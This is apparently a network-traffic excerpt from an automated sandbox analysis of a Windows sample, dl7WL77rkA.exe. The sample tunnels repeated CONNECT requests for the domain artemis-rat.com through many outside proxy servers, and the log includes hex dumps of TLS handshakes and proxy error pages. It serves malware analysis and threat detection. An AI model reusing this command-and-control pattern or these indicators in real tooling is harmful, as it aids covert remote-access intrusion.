                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            212192.168.2.55040442.49.148.16790013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.483267069 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.826827049 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            213192.168.2.550456184.181.217.22041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.492065907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            214192.168.2.550441207.180.198.241573273876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.495973110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.170489073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            215192.168.2.55043552.67.10.18331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.496236086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.822375059 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            216192.168.2.55046068.1.210.16341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.496788979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            217192.168.2.55044491.134.140.160164873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.497637987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.170476913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            218192.168.2.55044935.72.118.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.503235102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.772742987 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.773118973 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee 6c cd a1 37 cc b5 59 6e ec 5f 1b c9 bf 7c 83 4b 1b 53 62 7f e8 3a 93 61 ad 4c f5 bc 0c 69 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: lhel7Yn_|KSb:aLi*,+0/$#('=<5/artemis-rat.com#o Glt0\7.&ZyfEW'6%]+]l1Ga
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.046020985 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 58 6a 6c f2 06 10 96 e9 b7 c3 b9 0f 97 ce 35 ed ad 34 aa 61 eb bd a9 1c 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9Xjl54aDOWNGRD0000*H010Uartemis-rat.com0240311021335Z260311021335Z010Uartemis-rat.com0"0*H0K
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.048696995 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 b5 1c 2f f4 10 12 74 29 e5 d3 92 44 02 52 30 8b 41 7b 6d 5b e4 06 eb 22 7b ad 42 d8 4e 64 69 04 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 04 9b 94 9b 34 2e eb b9 fe eb a7 fe f6 42 4e 93 96 d0 6b a1 2c
                                                                                                                                                                                                                                                            Data Ascii: %! /t)DR0A{m["{BNdi(4.BNk,i
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.317107916 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 13 b1 9d 95 92 c8 6e dd 6a d9 a2 46 02 ca db 13 75 f4 6c 84 ea bb 33 93 21 44 64 fb 44 b6 f5 be af cb 15 51 1d d9 33 56
                                                                                                                                                                                                                                                            Data Ascii: (njFul3!DdDQ3V


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            219192.168.2.550575172.67.181.136803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.517925024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.671966076 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            220192.168.2.550573104.18.237.128803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.517940998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.672633886 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            221192.168.2.55058045.14.174.180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.521006107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.675307989 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            222192.168.2.5505063.90.100.1231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.521009922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.737607956 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            223192.168.2.550583172.67.182.153803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.524220943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.678627968 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            224192.168.2.550601104.21.6.88803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.541847944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.695975065 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            225192.168.2.550405185.191.236.16231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.541870117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.342346907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.942912102 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.974256039 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            226192.168.2.550763202.159.35.2014433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.546885014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            227192.168.2.55057247.184.175.16431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.548144102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.278701067 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                                            Server: squid/4.14
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3846
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e
